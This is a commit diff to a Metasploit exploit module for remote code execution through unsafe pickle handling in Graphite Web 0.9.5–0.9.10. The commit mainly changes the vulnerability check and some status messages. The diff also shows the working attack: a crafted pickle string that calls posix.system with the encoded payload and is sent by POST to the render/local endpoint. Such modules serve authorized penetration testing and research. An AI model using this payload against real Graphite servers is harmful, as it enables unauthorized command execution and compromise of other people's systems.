Fix check method

2013-08-20 12:02:09 -05:00 · 2013-08-20 12:02:09 -05:00 · 42f774a064
parent 533d98bd1b
commit 42f774a064
1 changed files with 9 additions and 7 deletions
--- a/modules/exploits/unix/webapp/graphite_pickle_exec.rb
+++ b/modules/exploits/unix/webapp/graphite_pickle_exec.rb
@ -16,11 +16,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		super(update_info(info,
 			'Name' 			=> 'Graphite Web Unsafe Pickle Handling',
 			'Description' 	=> %q{
-					This module exploits a remote code execution vulnerability in the
-				pickle handling of the rendering code in the Graphite Web project between
-				version 0.9.5 and 0.9.10(both included).
+				This module exploits a remote code execution vulnerability in the pickle
+				handling of the rendering code in the Graphite Web project between version
+				0.9.5 and 0.9.10(both included).
 			},
-			'Author' 		=>	
+			'Author' 		=>
 				[
 					'Charlie Eriksen' # Initial discovery and exploit
 				],
@ -60,19 +60,21 @@ class Metasploit3 < Msf::Exploit::Remote
 			'method' => 'POST'
 		})

-		if response.code != 200
-			return Exploit::CheckCode::Appears
+		if response and response.code == 500
+			return Exploit::CheckCode::Detected
 		end
 		return Exploit::CheckCode::Safe
 	end

 	def exploit
 		data = "line\ncposix\nsystem\np1\n(S'#{payload.encoded}'\np2\ntp3\nRp4\n."
+
+		print_status("Sending exploit payload...")
+
 		response = send_request_cgi({
 			'uri' 	 => normalize_uri(target_uri.path, 'render', 'local'),
 			'method' => 'POST',
 			'data' 	 => data
 		})
-		print_status("Sent exploit payload")
 	end
 end